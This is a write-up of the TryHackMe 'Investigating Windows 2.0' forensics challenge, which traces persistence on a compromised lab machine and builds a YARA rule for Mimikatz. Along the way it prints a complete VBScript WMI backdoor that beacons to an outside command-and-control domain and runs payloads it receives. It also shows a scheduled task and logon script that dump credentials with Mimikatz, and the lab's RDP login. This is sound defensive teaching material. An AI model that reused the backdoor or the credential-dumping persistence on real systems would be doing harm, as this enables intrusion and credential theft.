Type: Challenge
Difficulty: Medium
Tags: Windows
Meta Tags: Walkthrough, Walk-through, Write-up, Writeup
Subscription type: Free
Description:
In the previous challenge you performed a brief analysis. Within this challenge,
you will take a deeper dive into the attack.
Room link: https://tryhackme.com/room/investigatingwindows2
Note: In order to answer the questions in this challenge you should have completed the following rooms:
Tips for LOKI:
- When you run the Loki scan I suggest you save the output to a log file so you can reference it to answer the questions below.
- The scan may take a while to complete. Make sure the prompt is always moving. It's an indicator that the scan is still running. You can kill the scan after you see warnings for
ntds.ditfiles.
Connect to the machine using RDP.
The credentials of the machine are as follows:
- Username:
Administrator - Password:
letmein123!
Your machine's IP is: 10.64.189.51
If you're using Remmina to RDP, set the Color Depth to RemoteFX (32 bpp).
Note: This machine does not respond to ping (ICMP) and may take a few minutes to boot up.
┌──(kali㉿kali)-[/mnt/…/TryHackMe/Challenges/Medium/Investigating_Windows_2.0]
└─$ export TARGET_IP=10.64.189.51
┌──(kali㉿kali)-[/mnt/…/TryHackMe/Challenges/Medium/Investigating_Windows_2.0]
└─$ xfreerdp /v:$TARGET_IP /cert:ignore /u:Administrator /p:'letmein123!' /h:1024 /w:1500 +clipboard
[11:07:04:903] [17524:17525] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[11:07:04:903] [17524:17525] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
<---snip--->After connecting we open both an elevated command prompt (cmd.exe) window and an elevated PowerShell window.
The question is referring to the GameOver task that we identified in the previous challange:
C:\Users\Administrator> schtasks /Query /TN "GameOver" /V /FO LIST
Folder: \
HostName: EC2AMAZ-I8UHO76
TaskName: \GameOver
Next Run Time: 1/11/2026 10:12:00 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 1/11/2026 10:07:00 AM
Last Result: 0
Author: EC2AMAZ-I8UHO76\Administrator
Task To Run: C:\TMP\mim.exe sekurlsa::LogonPasswords > C:\TMP\o.txt
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 4:47:00 PM
Start Date: 3/2/2019
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 5 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledWe can search in the registry with reg query
C:\Users\Administrator> reg.exe QUERY HKCU /s /f mim.exe
HKEY_CURRENT_USER\Environment
UserInitMprLogonScript REG_MULTI_SZ C:\TMP\mim.exe sekurlsa::LogonPasswords > C:\TMP\o.txt
End of search: 1 match(es) found.
C:\Users\Administrator>Note that the Windows Defender antivirus will detect and remove this Mimikatz task after a while!
PS C:\Users\Administrator> Get-MpThreatDetection
ActionSuccess : True
AdditionalActionsBitMask : 0
AMProductVersion : 4.18.25100.9008
CleaningActionID : 2
CurrentThreatExecutionStatusID : 0
DetectionID : {07805B8A-011E-4870-B2FE-46779D831600}
DetectionSourceTypeID : 2
DomainUser : NT AUTHORITY\NETWORK SERVICE
InitialDetectionTime : 1/11/2026 12:44:11 PM
LastThreatStatusChangeTime : 1/11/2026 12:44:24 PM
ProcessName : Unknown
RemediationTime : 1/11/2026 12:44:24 PM
Resources : {file:_C:\Windows\System32\Tasks\GameOver, regkey:_HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB8C99A4-9D73-4DC0-9587-F8D0E9442B25},
regkey:_HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\GameOver,
taskscheduler:_C:\Windows\System32\Tasks\GameOver}
ThreatID : 2147741009
ThreatStatusErrorCode : 0
ThreatStatusID : 3
PSComputerName :Answer: HKCU\Environment\UserIntMprLogonScript
We can assume that the tool is one of the common Sysinternal tools in C:\Users\Administrator\Desktop\Tools\SysinternalsSuite.
A tools like:
- Process Monitor (
procmon.exeandprocmon64.exe) - Process Explorer (
procexp.exeandprocexp64.exe) - AutoRuns (
Autoruns.exeandAutoruns64.exe)
Start each tool to verify if it remains running or not.
Answer: procexp64.exe
WQL is the WMI Query Language.
We launch Autoruns and check the WMI tab:
There we find two entries, where one of the entries is named KillProcss.
Alternatively, we can get the answer with Get-WMIObject
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter
__GENUS : 2
__CLASS : __EventFilter
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __EventFilter.Name="TimingIntervalTrigger"
__PROPERTY_COUNT : 6
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : EC2AMAZ-I8UHO76
__NAMESPACE : ROOT\Subscription
__PATH : \\EC2AMAZ-I8UHO76\ROOT\Subscription:__EventFilter.Name="TimingIntervalTrigger"
CreatorSID : {1, 5, 0, 0...}
EventAccess :
EventNamespace : ROOT\cimv2
Name : TimingIntervalTrigger
Query : SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'
QueryLanguage : WQL
PSComputerName : EC2AMAZ-I8UHO76
__GENUS : 2
__CLASS : __EventFilter
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __EventFilter.Name="ProcessStartTrigger"
__PROPERTY_COUNT : 6
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : EC2AMAZ-I8UHO76
__NAMESPACE : ROOT\Subscription
__PATH : \\EC2AMAZ-I8UHO76\ROOT\Subscription:__EventFilter.Name="ProcessStartTrigger"
CreatorSID : {1, 5, 0, 0...}
EventAccess :
EventNamespace : ROOT\cimv2
Name : ProcessStartTrigger
Query : SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'procexp64.exe'
QueryLanguage : WQL
PSComputerName : EC2AMAZ-I8UHO76
__GENUS : 2
__CLASS : __EventFilter
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __EventFilter.Name="SCM Event Log Filter"
__PROPERTY_COUNT : 6
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : EC2AMAZ-I8UHO76
__NAMESPACE : ROOT\Subscription
__PATH : \\EC2AMAZ-I8UHO76\ROOT\Subscription:__EventFilter.Name="SCM Event Log Filter"
CreatorSID : {1, 2, 0, 0...}
EventAccess :
EventNamespace : root\cimv2
Name : SCM Event Log Filter
Query : select * from MSFT_SCMEventLogEvent
QueryLanguage : WQL
PSComputerName : EC2AMAZ-I8UHO76
PS C:\Users\Administrator>Answer: SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'procexp64.exe'
See image above.
Double-clicking on the entry shows the script which, after formatting, looks like this:
Dim oLocation, oServices, oProcessList, oProcess
Set oLocation = CreateObject("WbemScripting.SWbemLocator")
Set oServices = oLocation.ConnectServer(, "root\cimv2")
Set oProcessList = oServices.ExecQuery("SELECT * FROM Win32_Process WHERE ProcessID = " & TargetEvent.ProcessID)
For Each oProcess in oProcessList
oProcess.Terminate()
NextAnswer: VBScript
See image above.
Answer: LaunchBeaconingBackdoor
Double-clicking on the LaunchBeaconingBackdoor entry shows the following script (after beautifying at https://www.xhcode.com/vbscriptformat/)
Option Explicit
On Error Resume Next
Dim oXMLHTTP, oReg, aC2URL, aCmdType, aClassName, aPropertyName, aPayload, aMachineGuid
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
oReg.GetStringValue & H80000002, "SOFTWARE\Microsoft\Cryptography", "MachineGuid", aMachineGuid
aC2URL = "http://googleaccountsservices.com/index.html&ID=" & aMachineGuid
Sub StorePayloadInWMIRepo(classname, propertyname, payload)
Dim oLocation, oServices, oDataObject
Set oLocation = CreateObject("WbemScripting.SWbemLocator")
Set oServices = oLocation.ConnectServer(, "root\cimv2")
Set oDataObject = oServices.Get
oDataObject.Path_.Class = classname
oDataObject.Properties_.Add(propertyname, 8).Value = payload
oDataObject.Put _
End Sub
Sub DeleteWMIClass(classname, propertyname)
Dim oLocation, oServices, oDataObject
Set oLocation = CreateObject("WbemScripting.SWbemLocator")
Set oServices = oLocation.ConnectServer(, "root\cimv2")
Set oDataObject = oServices.Get
oDataObject.Path_.Class = classname
oDataObject.Properties_.Add(propertyname, 8).Value = ""
oDataObject.Delete_()
End Sub
Sub ExecCommand(command)
Dim oLocation, oServices, oProcess, oStartup, oConfig, oResult, iProcessID
Const HIDDEN_WINDOW = 12
Set oLocation = CreateObject("WbemScripting.SWbemLocator")
Set oServices = oLocation.ConnectServer(, "root\cimv2")
Set oStartup = oServices.Get("Win32_ProcessStartup")
Set oConfig = oStartup.SpawnInstance _
oConfig.ShowWindow = HIDDEN_WINDOW
Set oProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
oResult = oProcess.Create(command, Null, oConfig, iProcessID)
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
'remove white spaces, If any
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
'The source must consists from groups with Len of 4 chars
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
' Now decode each group:
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
' Each data group encodes up To 3 actual bytes.
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
' Convert each character into 6 bits of data, And add it To
' an integer For temporary storage. If a character is a '=', there
' is one fewer data byte. (There can only be a maximum of 2 '=' In
' the whole string.)
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = - 1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
'Hex splits the long To 6 groups with 4 bits
nGroup = Hex(nGroup)
'Add leading zeros
nGroup = String(6 - Len(nGroup), "0") & nGroup
'Convert the 3 byte hex integer (6 chars) To 3 characters
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
'add numDataBytes characters To out string
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.open "GET", aC2URL, False
oXMLHTTP.send()
If oXMLHTTP.Status = 200 Then
aCmdType = oXMLHTTP.getResponseHeader("Type")
aClassName = oXMLHTTP.getResponseHeader("Class")
aPropertyName = oXMLHTTP.getResponseHeader("Property")
aPayload = Base64Decode(oXMLHTTP.responseText)
Select Case aCmdType
Case "V"
If Not IsNull(aPayload) Then
Execute aPayload
End If
Case "P"
If Not IsNull(aClassName) And Not IsNull(aPropertyName) And Not IsNull(aPayload) Then
Call StorePayloadInWMIRepo(aClassName, aPropertyName, aPayload)
End If
Case "D"
If Not IsNull(aClassName) And Not IsNull(aPropertyName) Then
Call DeleteWMIClass(aClassName, aPropertyName)
End If
Case "C"
If Not IsNull(aPayload) Then
Call ExecCommand(aPayload)
End If
End Select
End IfThe software company is visible on these lines:
<---snip--->
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
<---snip--->Answer: Motobit Software
Hint: .com website goes first
See output above.
If you don't want to browse through the code manually, you can let CyberChef's Extract URLs recipe do the work:
Answer: http://www.motobit.com, http://motobit.cz
Search online for the name of the script from Q5 and one of the websites from the previous answer. What attack script comes up in your search?
Googling for Motobit LaunchBeaconingBackdoor gives you WMIBackdoor.ps1.
Answer: WMIBackdoor.ps1
We can easily search for files with where.exe
C:\Users\Administrator> where /R C:\ WMIBackdoor.ps1
C:\TMP\WMIBackdoor.ps1
C:\Users\Administrator>Answer: C:\TMP
Hint: Enter your answer in alphabetical order
We have already seen one of these tasks (GameOver) in question #1:
C:\Users\Administrator> schtasks /Query /TN "GameOver" /V /FO LIST
Folder: \
HostName: EC2AMAZ-I8UHO76
TaskName: \GameOver
Next Run Time: 1/11/2026 10:12:00 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 1/11/2026 10:07:00 AM
Last Result: 0
Author: EC2AMAZ-I8UHO76\Administrator
Task To Run: C:\TMP\mim.exe sekurlsa::LogonPasswords > C:\TMP\o.txt
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 4:47:00 PM
Start Date: 3/2/2019
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 5 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledThe other task can be seen from the Task Scheduler:
C:\Users\Administrator> schtasks /Query /TN "falshupdate22" /V /FO LIST
Folder: \
HostName: EC2AMAZ-I8UHO76
TaskName: \falshupdate22
Next Run Time: 1/11/2026 11:57:04 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 1/11/2026 11:55:04 AM
Last Result: 0
Author: Administrator
Task To Run: powershell.exe -WindowStyle Hidden -nop -c ""
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 4:49:04 PM
Start Date: 3/2/2019
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 2 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledWindows from both these scheduled tasks can be seen poping up regularly.
Note that the Windows Defender antivirus will detect and remove the Mimikatz task after a while!
PS C:\Users\Administrator> Get-MpThreatDetection
ActionSuccess : True
AdditionalActionsBitMask : 0
AMProductVersion : 4.18.25100.9008
CleaningActionID : 2
CurrentThreatExecutionStatusID : 0
DetectionID : {07805B8A-011E-4870-B2FE-46779D831600}
DetectionSourceTypeID : 2
DomainUser : NT AUTHORITY\NETWORK SERVICE
InitialDetectionTime : 1/11/2026 12:44:11 PM
LastThreatStatusChangeTime : 1/11/2026 12:44:24 PM
ProcessName : Unknown
RemediationTime : 1/11/2026 12:44:24 PM
Resources : {file:_C:\Windows\System32\Tasks\GameOver, regkey:_HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB8C99A4-9D73-4DC0-9587-F8D0E9442B25},
regkey:_HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\GameOver,
taskscheduler:_C:\Windows\System32\Tasks\GameOver}
ThreatID : 2147741009
ThreatStatusErrorCode : 0
ThreatStatusID : 3
PSComputerName :Answer: mim.exe, powershell.exe
Hint: Figure out how to launch Process Explorer
All scheduled tasks are spawned by svchost.exe in never versions of Windows.
We can verify this by running Process Monitor and set a filter that only shows Process Start and Process Exit.
Answer: svchost.exe
We more or less saw this in the image above but we can verify this with Process Monitor again running with a filter of Process Name is mim.exe
Answer: Process Start
Inspect the properties for the 1st occurrence of this process. In the Event tab what are the 4 pieces of information displayed? (answer, answer, answer, answer)
Double-clicking on the Process Start line for mim.exe in Process Monitor we get the following window:
Answer: Parent PID, Command line, Current directory, Environment
Hint: Try Process Hacker
Start Process Hacker and select the Disk tab. Scroll down and note the Namecolumn.
Answer: No process
We run loki.exe -l loki_log.txt from its folder
and check the log file
Answer: WMIScan
Answer: ProcessStartTrigger
Answer: __FilterToConsumerBinding
Answer: nbtscan.exe
Scroll to the right for the nbtscan.exe line to find the answer
Answer: Known Bad / Dual use classics
Search for APT in the log file
and scroll to the left of the line to the answer
Answer: p.exe
Scroll to the end of the line to find the answer
Answer: psexesvc.exe, Sysinternals PsExec
I found no matching alert, but there is a warning on the previous line.
The association is that the files are located in the same directory.
PS C:\Users\Administrator> where.exe /R C:\ *.dmp
C:\TMP\somethingwindows.dmp
PS C:\Users\Administrator>Answer: schtasks-backdoor.ps1
Search for Trojan in the log file
and scroll to the left of the line to the answer
Answer: xCmd.exe
There is a binary that can masquerade itself as a legitimate core Windows process/image. What is the full path of this binary?
A common binary/process to masquerade as is svchost.exe since their are multiple versions of the process running.
Searching for svchost and skipping the binaries that are located in the standard directory (C:\Windows\System32) gives us
Answer: C:\Users\Public\svchost.exe
See above and Wikipedia.
Answer: C:\Windows\System32
Scroll to the right of the line to the answer
Answer: Stuff running where it normally shouldn't
There is a file in the same folder location that is labeled as a hacktool. What is the name of the file?
Search for C:\Users\Public in the log file
and scroll to the right to verify that the description is a hacktool.
Answer: en-US.js
See image above.
Answer: CACTUSTORCH
We know since previously that Mimikatz (mim.exe) is on the machine, but the binary is not detected.
However, the Mimikatz log file is:
Answer: mim.exe
Complete the yar rule file located within the Tools folder on the Desktop. What are 3 strings to complete the rule in order to detect the binary Loki didn't hit on? (answer, answer, answer)
The test.yar file located in C:\Users\Administrator\Desktop\Tools\yara-v4.0.4-1544-win64 contains
rule mimikatz
{
strings:
$s1 = "??.??1"
$s2 = "??.?x?"
$s3 = "v?.?.????7"
condition:
all of them
}
rule mimikatz_lsass_mdmp
{
strings:
$lsass = "System32\\lsass.exe" wide nocase
condition:
(uint32(0) == 0x504d444d) and $lsass
}
We search for the strings patterns as regular expressions to find the answers:
PS C:\TMP> C:\Users\Administrator\Desktop\Tools\SysinternalsSuite\strings64.exe mim.exe | findstr "^..\...1$"
mk.ps1
mk.ps1
mk.ps1
PS C:\TMP> C:\Users\Administrator\Desktop\Tools\SysinternalsSuite\strings64.exe mim.exe | findstr "^..\..x.$"
mk.exe
mk.exe
mk.exe
PS C:\TMP> C:\Users\Administrator\Desktop\Tools\SysinternalsSuite\strings64.exe mim.exe | findstr "^v.\..\.....7$"
v2.0.50727
v2.0.50727
PS C:\TMP>After updating the rule file:
rule mimikatz
{
strings:
$s1 = "mk.ps1"
$s2 = "mk.exe"
$s3 = "v2.0.50727"
condition:
all of them
}
rule mimikatz_lsass_mdmp
{
strings:
$lsass = "System32\\lsass.exe" wide nocase
condition:
(uint32(0) == 0x504d444d) and $lsass
}
we can run YARA to verify that the detection works
C:\Users\Administrator\Desktop\Tools\yara-v4.0.4-1544-win64>yara64.exe test.yar C:\TMP
mimikatz C:\TMP\mim.exe
mimikatz_lsass_mdmp C:\TMP\somethingwindows.dmp
C:\Users\Administrator\Desktop\Tools\yara-v4.0.4-1544-win64>Answer: mk.ps1, mk.exe, v2.0.50727
For additional information, please see the references below.
- A Deep Dive Into Windows Scheduled Tasks and The Processes Running Them
- Autoruns - Homepage
- CyberChef - GitHub
- CyberChef - Homepage
- findstr - Microsoft Learn
- Get-WmiObject - Microsoft Learn
- Loki - GitHub
- Loki-RS - GitHub
- Logon Script (Windows) - MITRE ATT&CK
- Mimikatz - Github
- Mimikatz - MITRE ATT&CK
- Mimikatz - Wiki
- Process Explorer - Homepage
- Process Monitor - Homepage
- Regular expression - Wikipedia
- Remote Desktop Protocol - Wikipedia
- Scheduled Task - MITRE ATT&CK
- schtasks - Microsoft Learn
- Strings - Homepage
- svchost.exe - Wikipedia
- VBScript - Wikipedia
- Windows Management Instrumentation - Wikipedia
- Windows Registry - Wikipedia
- WQL - Wikipedia
- xfreerdp - Linux manual page
- Yara - Documentation
- Yara - GitHub
- Yara - Homepage
























